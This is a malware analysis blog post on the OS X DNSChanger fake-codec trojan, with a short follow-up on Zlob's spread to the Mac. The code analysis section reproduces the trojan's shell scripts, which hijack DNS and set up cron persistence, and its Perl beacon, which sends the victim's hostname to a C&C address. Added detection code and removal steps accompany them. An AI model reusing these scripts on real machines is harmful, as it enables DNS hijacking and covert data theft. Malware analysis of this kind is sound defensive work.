Posts Tagged ‘fake codec’

Porn Trojan Talks

Unusual Pop-up Ads

If you thought Trojan DNSChanger was dead, think again: lately there has been a series of reports from Mac OS X users seeing unusual pop-up ads on their machines. Most of the infected users noticed that the unusual ads were coming from the IP address 216.255.xxx.xxx, as shown in the screenshot above.

This IP address points to Intercage [AS27595], which is hosted by Atrivo in the US and is apparently related to the Russian Business Network (RBN). This host serves a number of domain names related to fake codecs and rogue applications such as spysheriff, winspykiller, AntiVirGear and many more. [Further Reading]

Unusual pop-up ads and altered browser results are among the visible symptoms of this threat. Infected users should immediately restore their DNS settings and remove the following files from this folder:

~/Library/Internet Plug-Ins/plugins.settings
~/Library/Internet Plug-Ins/sendreq (usually the malware deletes this, but just double check)
~/Library/Internet Plug-Ins/QuickTime.xpt
~/Library/Internet Plug-Ins/Mozillaplug.plugin
Related Posts:

Analysis of Trojan DNSChanger
Malware Retailer Includes Trojan for Mac
Fake YouTube Installs OS X Trojan DNSChange

Analysis of OSX Trojan DNS Changer

::::::::::::
File Size
::::::::::::

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)


:::::::::::::::::
Propagation
:::::::::::::::::
This malicious code does not spread or propagate by itself. It uses an old but effective social engineering technique to entice users to install the program manually. The trojan disguises itself as a video codec and attaches itself to shared and freely downloadable videos. It was first seen linked from porn sites, but later it was also linked from funny-video sites and seen on splogs (spam blogs).

Is this in the wild? Yes.

::::::::::::::::::::::::::::::::::
Installation & Behaviour
::::::::::::::::::::::::::::::::::
A user visits a rogue site and downloads a fake video codec. Check the screenshot here.


The disk image file is automatically mounted but not extracted. This means the user has to install the downloaded package manually.


The downloaded installer, Install.pkg, contains the following files:



Info.plist is the first file read during the installation. It contains detailed usage and behaviour information such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart


Next comes Archive.bom, which contains the list of files to install.

lsbom -s install.pkg/Contents/Archive.bom
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq


It then accesses the files description.plist and PkgInfo, which give the following information:

Version: 1.0
Description:
“Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

Next comes BundleVersions.plist, for version information.

The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.


Now let's look further at the malicious code.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contain the shell scripts that do the dirty work.


postinstall and postupgrade contain exactly the same code, as do preinstall and preupgrade.

preinstall is invoked after the user agrees to the License Agreement. This trojan has no damaging payload; it only modifies the user's DNS settings. Let's check the code.

:::::::::::::::::::::::
Code Analysis
:::::::::::::::::::::::


Preinstall script:

#!/bin/bash
s1=85.255.115.22
s2=85.255.112.190
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<EOF


Using scutil, it retrieves the identifier of the user's primary network service and stores it in PSID.

open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

It then sets the DNS name servers to s1=85.255.115.22 and s2=85.255.112.190:

/usr/sbin/scutil
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit

**Take note: IP addresses may change per variant.

It checks the current crontab for an entry referencing plugins.settings in /Library/Internet Plug-Ins. This entry is a marker: it indicates whether the trojan has already been installed.

exist=`crontab -l|grep plugins.settings`

If no such entry exists (meaning the trojan was not yet installed), the installation proceeds by dropping a temporary file, cron.inst:

if [ "$exist" == "" ]; then
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst


cron.inst contains the following line:

* * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1


It then installs cron.inst as the crontab using the crontab command:

crontab cron.inst

The cron entry runs another script, QuickTime.xpt, every minute from /Library/Internet Plug-Ins/:

“/Library/Internet Plug-Ins/QuickTime.xpt”

The redirection at the end of the entry,

>/dev/null 2>&1

sends QuickTime.xpt's standard output to /dev/null and its standard error to the same place, so the script runs silently in the background instead of showing errors or command output on the user's screen.


Once cron.inst has been installed, the preinstall script deletes the temporary file:

rm -rf cron.inst
fi

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its contents to /Library/Internet Plug-Ins/.

Like the preinstall script, QuickTime.xpt reads the user's network information, attempts to modify the DNS name server settings, checks whether QuickTime.xpt exists and, if it does, creates cron.inst, executes it and deletes the temporary file.
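The two host-side traces the preinstall script leaves behind, the marker cron entry and the rewritten ServerAddresses, are what a responder would check for. The following is an added example, not code from the original post: it parses `crontab -l` output and a `scutil` DNS dictionary dump (both constructed here, modelled on the entries shown above) and flags the indicators analysed in this post.

```python
import re

# Host indicators taken from the preinstall script analysed above.
ROGUE_DNS_PREFIXES = ("85.255.",)   # range shared by s1 and s2; may change per variant
MARKER_PATHS = (
    "/Library/Internet Plug-Ins/plugins.settings",
    "/Library/Internet Plug-Ins/QuickTime.xpt",
)

# scutil prints the ServerAddresses array as "    0 : 85.255.115.22" lines.
_SERVER_LINE = re.compile(r"^\s*\d+\s*:\s*(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.M)


def crontab_hits(crontab_text):
    """Return the cron lines that run a file from the trojan's plug-in folder."""
    return [line for line in crontab_text.splitlines()
            if any(path in line for path in MARKER_PATHS)]


def rogue_dns_servers(scutil_dump):
    """Parse a scutil DNS dictionary dump and return the servers in the rogue range."""
    servers = _SERVER_LINE.findall(scutil_dump)
    return [s for s in servers if s.startswith(ROGUE_DNS_PREFIXES)]


def assess(crontab_text, scutil_dump):
    """Combine both checks into one verdict, as a host-based detection would."""
    cron = crontab_hits(crontab_text)
    dns = rogue_dns_servers(scutil_dump)
    return {"cron_entries": cron, "rogue_dns": dns, "infected": bool(cron or dns)}


# Constructed sample input, modelled on the cron.inst line and the DNS change shown above.
SAMPLE_CRONTAB = '* * * * * "/Library/Internet Plug-Ins/plugins.settings">/dev/null 2>&1\n'
SAMPLE_SCUTIL = """<dictionary> {
  ServerAddresses : <array> {
    0 : 85.255.115.22
    1 : 85.255.112.190
  }
}
"""
# A clean host for comparison (constructed).
CLEAN_CRONTAB = "0 3 * * * /usr/local/bin/backup.sh\n"
CLEAN_SCUTIL = SAMPLE_SCUTIL.replace("85.255.115.22", "192.168.1.1").replace("85.255.112.190", "8.8.8.8")

if __name__ == "__main__":
    print(assess(SAMPLE_CRONTAB, SAMPLE_SCUTIL))   # infected: True
    print(assess(CLEAN_CRONTAB, CLEAN_SCUTIL))     # infected: False
```

On a live Mac the two inputs would come from `crontab -l` and from `scutil` showing State:/Network/Service/<PSID>/DNS, exactly the dictionary the script rewrites.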

Postinstall script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

It executes sendreq, which is a Perl script, and then deletes it.

SendReq Script:

This Perl-based bot acts as a backdoor client component and communicates with a remote server over a socket.

#!/usr/bin/perl
use IO::Socket;

It uses MIME base64 encoding (a pure-Perl encode_base64 routine) to transmit messages over HTTP:

sub encode_base64 {
use integer;
my $eol = $_[1];
$eol = "\n" unless defined $eol;

my $res = pack("u", $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;

$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
}


The bot's command-and-control server:

my $server="85.255.121.37";

**Take note: IP addresses may change per variant.

It runs uname -p to retrieve the victim's processor type, and hostname to retrieve the host name:

my $cmd=`uname -p;echo ";";hostname`;$cmd=~s/\n//g;   # run the commands and join their output into one line


It base64-encodes the gathered information, prefixed with "mac;":

my $uniqid=encode_base64("mac;".$cmd); $uniqid=~s/\n//g;


It builds a request to the remote server, carrying the encoded string in the Accept-Language header:

my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";


The bot then opens a TCP connection to port 80 on the remote server and sends the request:

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);


The captured packet looks like this:


It sends the victim's information as a base64-encoded string:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host: 85.255.121.37


Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host: 85.255.121.37

From this information, the C&C (command-and-control) server can determine the total number of infections and the IP address and geographical location of each infected host.
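Because the beacon hides the host fingerprint in a header that normally holds a language tag, it can be picked out of captured traffic by decoding Accept-Language and checking for the "mac;<arch>;<hostname>" layout shown above. The following detector is an added example, not part of the original post; the sample requests are constructed (the hostname is made up, the Host value is the C&C address from the capture).

```python
import base64
import binascii
import re

# A sendreq beacon is "GET / HTTP/1.1" whose Accept-Language header carries
# base64("mac;<uname -p output>;<hostname>") instead of a language tag.
BEACON_RE = re.compile(r"^(mac);([^;]+);([^;]+)$")


def parse_request(raw):
    """Split a raw HTTP request into its request line and a header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def decode_beacon(raw):
    """Return (platform, arch, hostname) if the request is a DNSChanger beacon, else None."""
    request_line, headers = parse_request(raw)
    lang = headers.get("accept-language")
    if not request_line.startswith("GET / HTTP/1.") or lang is None:
        return None
    try:
        decoded = base64.b64decode(lang, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None  # a real Accept-Language such as "en-US,en;q=0.5" is not valid base64
    match = BEACON_RE.match(decoded)
    return match.groups() if match else None


# Constructed samples: one beacon to the C&C address seen above, one ordinary browser request.
SAMPLE_BEACON = ("GET / HTTP/1.1\r\nAccept-Language: "
                 + base64.b64encode(b"mac;i386;lab-macbook.local").decode("ascii")
                 + "\r\nHost: 85.255.121.37\r\n\r\n")
SAMPLE_BENIGN = ("GET / HTTP/1.1\r\nAccept-Language: en-US,en;q=0.5\r\n"
                 "Host: example.com\r\n\r\n")

if __name__ == "__main__":
    print(decode_beacon(SAMPLE_BEACON))   # ('mac', 'i386', 'lab-macbook.local')
    print(decode_beacon(SAMPLE_BENIGN))   # None
```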

Furthermore, later versions of this trojan's scripts are obfuscated, making it a little harder for security analysts and researchers to read the code.


::::::::::::::
Conclusion
::::::::::::::

Trojan DNSChanger is as simple as changing DNS settings: no complication and no destructive behaviour. These are simple scripts that are widely available online, built into a Mac installer and deployed on several existing fake codec domains.

The lesson here is that malware or threats on the Mac do not have to be complicated. With the vast amount of information available online, it is possible for an ordinary person without a programming background, a so-called script kiddie, to cause interruption and damage to our daily lives.

Mac OS X: 2007 Year Ender for Zlob

Zlob has been proliferating on the Windows platform since 2005. It started as a simple trojan downloader and stealer capable of checking for and applying updates to itself.

Then, last year, this trojan stood out from the crowd of competing malware. A new variant arrived via email, employing social engineering tactics to entice users into clicking a link to a video. However, the video would not play without installing the required codec. This trick persuades the user to install the fake codec; unknowingly, the user has just installed the malware!

The surge of file shares, free downloads, blogs and social websites has become a perfect vehicle for Zlob to infiltrate networks. Evidently, the growing number of domain names and clicks has helped Zlob stay visible in search engines.

All of this worked on Windows until late this year (November), when the trojan crossed over to the Mac, specifically OS X. Suddenly, a list of domain names is capable of serving installers to both Windows and Mac users. The domain names hosting the Zlob fake codec for Mac users never sleep: they stay online 24×7 and are increasing in number. It's out there in the wild!



These sites are smart enough to check whether you are running Windows or a Mac, and then serve you the right installer: a Windows executable (EXE) or a disk image (DMG) for Mac.



Who's behind Zlob? Let's investigate its network connections...

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Web Site: http://codecdemo.com

A-->64.28.184.189--PTR->64.28.184.189-rev.cernel.net
NS-->ns1.codecdemo.com---A-->64.28.181.226--PTR->64-28-181-226-rev.cernel.net
NS-->ns2.codecdemo.com----A-->64.28.181.227--PTR->64-28-181-227-rev.cernel.net
MX-->10 mail.codecdemo.com--A-->64.28.184.164--PTR->64-28-184-164-rev.cernel.net

NET ----> gw1.cernel.net [64.28.176.1]--> AS27595
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Intercage [AS27595] is hosted by Atrivo in the US, which is apparently related to the Russian Business Network (RBN). This host serves different domain names related to fake codecs and rogue applications such as spysheriff, winspykiller, AntiVirGear and many more.

In conclusion, the massive increase in sophisticated and organised cyber crime boils down to the pursuit of profit, and Mac users are no longer subject only to proofs of concept. The world's worst known attackers are now introducing web-based cross-platform malware, and this should raise awareness.